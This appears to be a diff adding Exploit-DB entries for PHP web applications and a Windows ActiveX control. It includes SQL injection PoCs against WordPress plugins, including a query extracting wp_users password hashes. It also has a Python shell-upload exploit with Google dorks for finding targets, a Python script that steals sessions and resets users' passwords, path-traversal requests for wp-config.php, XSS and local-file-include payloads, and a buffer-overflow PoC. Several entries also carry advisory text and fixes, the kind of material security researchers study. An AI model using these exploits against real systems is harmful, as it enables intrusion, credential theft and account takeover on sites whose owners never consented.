Vulnerable code: (Line: 1516 -> 1530)
function email_vendor()
{
global $wpdb, $current_user;
if (count($_POST['vendor_email']) == 0) {
echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
} else {
$files = implode(",", $_POST['vendor_email']);
echo "SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")"."\n";
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")", ARRAY_A);
Link 2: http://server/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
function download_project()
{
global $wpdb, $current_user;
$user_ID = $_GET['id'];
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where pid = $user_ID order by date desc", ARRAY_A);
$r_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID ", ARRAY_A);
$return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
$zip = new Zip();
$dir = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
$path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) {
$zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header("Location: " . $path . $return_file . "");
}
Link 3: http://server/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
function download_archive()
{
global $wpdb, $current_user;
$user_ID = $_GET['id'];
$dir = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
$path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
$return_file = "Account.zip";
$zip = new Zip();
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where uid = $user_ID order by date desc", ARRAY_A);
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) {
$zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header("Location: " . $path . $return_file . "");
}
Link 4: http://server/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
function remove_cat()
{
global $wpdb, $current_user;
$wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . " ");
$wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . " ");
}

96
platforms/php/webapps/35340.txt Executable file
View file

@ -0,0 +1,96 @@
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
"table_id" variable is not sanitized.
File: wpdatatables.php
------------------------
// AJAX-handlers
add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
/**
* Handler which returns the AJAX response
*/
function wdt_get_ajax_data(){
$id = $_GET['table_id']; <------------------- Not Sanitized!
$table_data = wdt_get_table_by_id( $id );
$column_data = wdt_get_columns_by_table_id( $id );
$column_headers = array();
$column_types = array();
$column_filtertypes = array();
$column_inputtypes = array();
foreach($column_data as $column){
$column_order[(int)$column->pos] = $column->orig_header;
if($column->display_header){
$column_headers[$column->orig_header] = $column->display_header;
}
if($column->column_type != 'autodetect'){
$column_types[$column->orig_header] = $column->column_type;
}else{
$column_types[$column->orig_header] = 'string';
}
$column_filtertypes[$column->orig_header] = $column->filter_type;
$column_inputtypes[$column->orig_header] = $column->input_type;
}
------------------------
(The vulnerable variable is located in others php files)
######################
# PoC
http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
# Sqlmap
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
---
Parameter: table_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=get_wdtable&table_id=1 AND 9029=9029
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
---
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

179
platforms/php/webapps/35341.py Executable file
View file

@ -0,0 +1,179 @@
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
#
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
# function wdt_upload_file(){
# require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
# $uploadHandler = new UploadHandler();
# exit();
# }
# ...
# ...
# ...
# add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' );
# add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' );
#
#
# Issue n.2 (lib/upload/UploadHandler.php)
#
# This php script allows you to upload any type of file
#
# ---------------------------------------------------------------------
#
# Dork google: inurl:/plugins/wpdatatables
# inurl:codecanyon-3958969
# index of "wpdatatables"
# index of "codecanyon-3958969"
#
# Tested on BackBox 3.x
#
#
# http connection
import urllib, urllib2, sys, re
# Args management
import optparse
# file management
import os, os.path
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
getfields = dict()
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
L.append('Content-Type: application/force-download')
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ ______ __ _______ __ __
| Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----.
|. | | _ |. | \| _ | _| _ |.| | | _ | _ | | -__|__ --|
|. / \ | __|. | |___._|____|___._`-|. |-|___._|_____|__|_____|_____|
|: |__| |: 1 / |: |
|::.|:. | |::.. . / |::.|
`--- ---' `------' `---'
Sh311 Upl04d Vuln3r4b1l1ty
<= 1.5.3
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
bodyupload = create_body_sh3ll_upl04d(payloadname)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0":
print("[X] Upload Failed :(")
else:
backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1)
print("[!] Shell Uploaded")
print("[!] Location: "+backdoor_location.replace("\\",""))
except urllib2.HTTPError as e:
print("[X] Http Error: "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))

30
platforms/php/webapps/35346.txt Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: DukaPress 2.5.2 Path Traversal
# Date: 27-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl
# Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
# Category: webapps
# CVE: CVE-2014-8799
1. Description
dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.
File: dukapress\lib\dp_image.php
if (!function_exists('add_action')) {
require_once('../../../../wp-load.php');
}
echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));
http://security.szurek.pl/dukapress-252-path-traversal.html
2. Proof of Concept
http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
3. Solution:
Update to version 2.5.4
https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip
https://plugins.trac.wordpress.org/changeset/1024640/dukapress

11
platforms/php/webapps/35360.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/46444/info
WSN Guest is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
WSN Guest 1.24 is vulnerable; other versions may also be vulnerable.
GET /wsnguest/index.php?debug=1 HTTP/1.0
Host: www.example.com
Cookie: wsnuser=[SQL Injection]

7
platforms/php/webapps/35361.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46457/info
Escort Directory CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/main/HotBrunette,-3+union+select+1,2,version(),4,5,6,7--+

17
platforms/php/webapps/35362.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/46467/info
Batavi is prone to multiple local file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Batavi 1.0 is vulnerable; other versions may also be affected.
Cross site scripting:
http://www.example.com/batavi/ext/xmlrpc/debugger/controller.php?action=&altmethodpayload=&#039;;}alert(0);{// http://www.example.com/batavi/admin/templates/pages/event_manager/edit.php?mID=%3C/script%3E%3Chtml%3E%3Cscript%3Ealert(0);%3C/script%3E%3C/html%3E http://www.example.com/batavi/admin/ext/color_picker/default.php?store_root=%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
Local file include:
http://www.example.com/batavi/admin/templates/pages/templates_boxes/info.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/batch_delete.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/delete_rule.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/edit.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/edit_rule.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/info.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/templates/uninstall.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/images/main.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/statistics/main.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://www.example.com/batavi/admin/templates/pages/export/download.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini http://www.example.com/batavi/admin/templates/pages/page_layout/main.php?filter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

77
platforms/php/webapps/35365.py Executable file
View file

@ -0,0 +1,77 @@
#!/usr/bin/python
import httplib
from bs4 import BeautifulSoup
import re
import os
###########
# Function that takes an SQL select statement and inject it into the words_exact variable of dosearch.php
# Returns BeautifulSoup object
###########
def sqli(select):
inject = '"\' IN BOOLEAN MODE) UNION ' + select + '#'
body = 'words_all=&words_exact=' + inject + '&words_any=&words_without=&name_exact=&ing_modifier=2'
c = httplib.HTTPConnection('127.0.0.1:80')
c.request("POST", '/phpMyRecipes/dosearch.php', body, headers)
r = c.getresponse()
html = r.read()
return BeautifulSoup(html)
#############
# Variables #
#############
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Endocing": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded"}
select = 'SELECT userid,sessionID from sessions;' # Modify the select statement to see what else you can do
data = {}
###########
# Run Injection and see what comes back
###########
soup = sqli(select)
###########
# Parse returned information with BeautifulSoup- store in data dictionary
###########
for ID in soup("a", text=re.compile(r"^.{32}$")):
data[ID.string] = {}
values = ['userid','username','cookieOK','privs','ts']
for value in values:
#select = "SELECT NULL,userid from sessions where sessionID='" + ID.string + "';"
select = "SELECT NULL," + value + " from sessions where sessionID='" + ID.string + "';"
soup = sqli(select)
rval = soup("a")[-1].string
data[ID.string][value] = rval
###########
# Loop through data- print session information and decide if you want to change a user's password
###########
for sessionid,values in data.iteritems():
print "Session ID: " + sessionid
for field,value in values.iteritems():
print "\t" + field + ": " + value
print("Do you want to change this user's password? (y/N)"),
ans = 'N'
ans = raw_input()
goforth = re.compile("[Yy].*")
if goforth.match(ans):
print("Enter new password: "),
os.system("stty -echo")
password1 = raw_input()
os.system("stty echo")
print("\nAgain with the password: "),
os.system("stty -echo")
password2 = raw_input()
os.system("stty echo")
print ("")
if password1 == password2:
body = 'sid=' + sessionid + '&username=' + data[sessionid]['username'] + '&name=Hacked&email=hacked%40hacked.com&password1=' + password1 + '&password2=' + password1
c = httplib.HTTPConnection('127.0.0.1:80')
c.request("POST", '/phpMyRecipes/profile.php', body, headers)
r = c.getresponse()
html = r.read()
print ("===================================")
print BeautifulSoup(html)("p",{"class": "content"})[0].string
print ("===================================\n\n")
else:
print "Passwords did not match"

17
platforms/php/webapps/35367.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: crea8social 1.3 Stored XSS Vulnerability
# Date: 24-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.3
# Vendor Homepage: http://codecanyon.net/item/crea8social-php-social-networking-platform-v13/9211270
# Tested on: Chrome & Iceweasel
# Vulnerability Description:
===Stored XSS===
Create a page from "Pages" (/pages) section. "Page Website" input is not secure. You can run XSS payloads on "Page Website" input.
Sample Payload for Stored XSS: http://example.com/">[xssPayload]
=Solution=
Filter the input field against to XSS attacks.
================

48
platforms/php/webapps/35371.txt Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: Google Doc Embedder 2.5.14 SQL Injection
# Date: 10-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/google-document-embedder.2.5.14.zip
# Category: webapps
1. Description
$_GET['gpid'] is not escaped.
File: google-document-embedder\view.php
if ( isset( $_GET['gpid'] ) ) {
if ( $profile = gde_get_profile( $_GET['gpid'] ) ) {
$tb = $profile['tb_flags'];
$vw = $profile['vw_flags'];
$bg = $profile['vw_bgcolor'];
$css = $profile['vw_css'];
}
}
So we control $id.
File: google-document-embedder\view.php
function gde_get_profile( $id ) {
global $wpdb;
$table = $wpdb->prefix . 'gde_profiles';
$profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A );
$profile = unserialize($profile[0]['profile_data']);
if ( is_array($profile) ) {
return $profile;
} else {
return false;
}
}
http://security.szurek.pl/google-doc-embedder-2514-sql-injection.html
2. Proof of Concept
http://wordpress-install/wp-content/plugins/google-document-embedder/view.php?embedded=1&gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1
3. Solution:
Update to version 2.5.15
https://downloads.wordpress.org/plugin/google-document-embedder.2.5.15.zip
https://plugins.trac.wordpress.org/changeset/1023572/google-document-embedder

9
platforms/php/webapps/35373.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46480/info
The GD Star Rating plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GD Star Rating 1.9.7 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/gd-star-rating/widgets/widget_top.php?wpfn="><script>alert("XSS");</script>

7
platforms/php/webapps/35374.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46481/info
IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"

7
platforms/php/webapps/35375.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46486/info
Vanilla Forums is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/vanilla/index.php?p=[xss]

167
platforms/windows/dos/35363.txt Executable file
View file

@ -0,0 +1,167 @@
?
TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W
Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.
Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.
-----------------------------------------------------------------------------
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
-----------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php
16.11.2014
---
Properties:
-----------
FileDescription UltraCam ActiveX Control
FileVersion 1, 1, 52, 16
InternalName UltraCamX
OriginalFileName UltraCamX.ocx
ProductName UltraCam device ActiveX Control
ProductVersion 1, 1, 52, 16
List of members:
----------------
Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
RemoteHost
RemotePort
AccountCode
GetConfigValue
SetConfigValue
SetCGIAPNAME
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
Event_Frame
PlayVideo
SetAutoScale
Event_Signal
WavPlay
CGI_ParamGet
CGI_ParamSet
MulticastEnable
MulticastStatus
SetPTUserAllow
Vulnerable members of the class:
--------------------------------
CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost
PoC(s):
-------
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraCamLib.UltraCamX"
argCount = 1
thricer=String(8212, "A")
target.SnapFileName = thricer
</script>
</html>
--
eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861 movzx ecx,byte ptr [eax+61h] ds:002b:414141a2=??
--
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid = "UltraCamLib.UltraCamX"
argCount = 1
thricer=String(2068, "A")
target.OpenFileDlg thricer
</script>
</html>
--
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
--